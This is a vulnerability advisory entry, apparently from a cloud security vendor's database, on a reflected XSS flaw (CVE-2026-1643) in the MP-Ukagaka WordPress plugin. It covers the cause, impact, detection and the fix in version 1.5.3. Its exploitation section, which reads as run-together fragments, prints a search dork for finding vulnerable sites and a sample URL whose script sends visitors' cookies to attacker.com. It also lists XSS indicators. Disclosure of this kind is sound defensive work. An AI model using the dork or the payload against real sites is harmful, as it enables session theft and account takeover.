
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1643 is a Reflected Cross-Site Scripting (XSS) vulnerability in the MP-Ukagaka plugin for WordPress, developed by Ariagle. It affects all versions up to and including 1.5.2 due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts into pages. The vulnerability was published on February 7, 2026, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a reflected XSS flaw in the plugin's options.php file (around line 160), where user-supplied input is neither sanitized on input nor escaped on output before being rendered in the browser. An unauthenticated attacker can craft a malicious URL containing a JavaScript payload and deliver it to a victim; when the victim clicks the link, the script executes in their browser within the context of the WordPress site. No authentication or elevated privileges are required, though user interaction (clicking a link) is necessary for exploitation (Wordfence, WordPress Plugin Trac).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, potentially leading to session token theft, credential harvesting, or page defacement. Because the scope is changed (cross-origin impact), the attacker can access cookies and data associated with the WordPress site even from an external origin. Confidentiality and integrity are both impacted at a low level per the CVSS scoring, with no direct availability impact; however, chained with other vulnerabilities, stolen session tokens could enable account takeover (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1643 as of the available data. The EPSS score is approximately 0.087%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering to trick a victim into clicking a crafted link, which raises the bar compared to fully unauthenticated, no-interaction vulnerabilities (Wordfence).
inurl:/wp-content/plugins/mp-ukagaka).options.php (around line 160) that reflects unsanitized user input back into the page response.https://target-site.com/wp-content/plugins/mp-ukagaka/options.php?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.options.php with URL-encoded script tags or JavaScript event handlers in query parameters.options.php with parameters containing <script>, javascript:, onerror=, or other XSS indicators; referrer headers pointing to external phishing domains.WordPress site administrators should update the MP-Ukagaka plugin to version 1.5.3 or later, which addresses the insufficient input sanitization and output escaping issues. If an immediate update is not possible, consider deactivating and removing the plugin until a patch can be applied. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation attempts in the interim (Wordfence, Wordfence Weekly Report).
Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of February 2–8, 2026, noting the reflected XSS nature and the availability of a patch in version 1.5.3 (Wordfence Weekly Report). Spanish national cybersecurity agencies INCIBE-CERT and CCN-CERT also published advisories referencing the vulnerability (INCIBE-CERT, CCN-CERT). No significant broader media coverage or notable researcher commentary beyond standard vulnerability tracking has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."